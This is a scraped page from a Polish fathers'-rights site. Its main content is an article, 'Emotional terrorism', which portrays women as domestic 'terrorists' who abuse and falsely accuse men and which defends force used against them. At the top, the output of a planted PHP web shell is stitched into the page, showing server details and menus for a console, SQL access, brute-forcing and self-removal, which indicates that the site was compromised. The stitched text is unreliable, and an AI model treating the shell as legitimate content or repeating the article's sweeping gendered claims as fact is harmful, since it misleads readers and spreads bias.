W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 02:00:53
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Terroryzm emocjonalny
10.09.2008.

Przeglądając informacje na temat przemocy z innych krajów nie sposób nie odnieść wrażenia, że problemy mężczyzn z przemocą kobiet wcale nie są polską domeną. Wydaje się, że u nas tylko w dalszym ciągu pokutuje mit, że to mężczyźni są wyłącznie winny całej przemocy domowej. Bardzo interesujące są obserwacje Erin Pizzey która ponad 30 lat temu rozpoczęła pracę z kobietami będącymi ofiarami przemocy rodzinie (!)

Przemoc domowa, czy skierowana na mężczyznę, czy kobietę, niejest prostą fizyczną przemocą.

Pizzey zauważyła, że niektóre kobiety angażują się w związki pełne przemocy zarówno fizycznej, jak psychicznej. Wynika to z głęboko zakorzenionych uczuć mściwości i nienawiści. Te kobiety zachowują się w sposób niezwykle destrukcyjny – wobec innych, ale też wobec siebie. Odnajdują się w rodzinie jako rodzinne terrorystki.

Póki rodzina pozostaje w całości, jakkolwiek nieszczęśliwa jest ta „całość”, terrorystka utrzymuje swoją moc. Natomiast, kiedy rodzina się dzieli, rozpada i ma nadzieję zerwać z „terrorem” terrorystka, czuje się zagrożona, samotna i co za tym idzie jeszcze bardziej niebezpieczna.

Terrorystka może mieć wiele potencjalnych celów: na przykład ponowne scalenie rodziny; upewnienie się, że dzieci (jeżeli są) pozostaną pod jej kontrolą, albo aktywne niszczenie swojego (eks-) współmałżonka: emocjonalnie, fizycznie, psychicznie.

Jak widzimy jest możemy mieć tu pozorny paradoks – kobieta, pozornie zachowuje się tak, jakby chciała zniszczyć swoją rodzinę. A faktycznie może chcieć ją scalić dla swoich destrukcyjnych celów.

Terrorystki i ich działania nie znają granic. Skoncentrowane wyłącznie na osiągnięciu celu nie będą wahać się: śledzić małżonka; fizyczne znęcać się nad nim, albo na jego nowej partnerce. Do częstych metod należy również obdzwanianie wszystkich wspólnych znajomych, partnerów biznesowych, kolegów z pracy po to tylko by zrujnować mu reputację. Może też oskarżać go o przestępstwa np. o: molestowanie dzieci, niszczenie mienia współmałżonka, próbę morderstwa współmałżonka i dzieci w ramach odwetu itd.

Fałszywe oskarżenia o przemoc domową, albo inne nadużycia są coraz częściej stosowane przeciwko mężczyznom w trakcie rozwodu, wyłącznie w celu zapewnienia sobie przewagi w walce o opiekę nad dziećmi i mieszkanie.

Wściekła kobieta jest przeraźliwym widowiskiem nawet dla najbardziej doświadczonych policjantów. Kobiety często atakują swoich partnerów używając niebezpiecznych narzędzi.

Obrona siebie jest bez wątpienia uzasadniona w takich okolicznościach i będzie angażować użycie siły przeciwko kobiecie by powstrzymać ją, w przeciwnym razie to on będzie musiał uciec.

Jednak, jeśli w trakcie, kiedy on będzie próbował ją powstrzymać, ona zostanie ranna, prawie na pewno on zostanie aresztowany.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.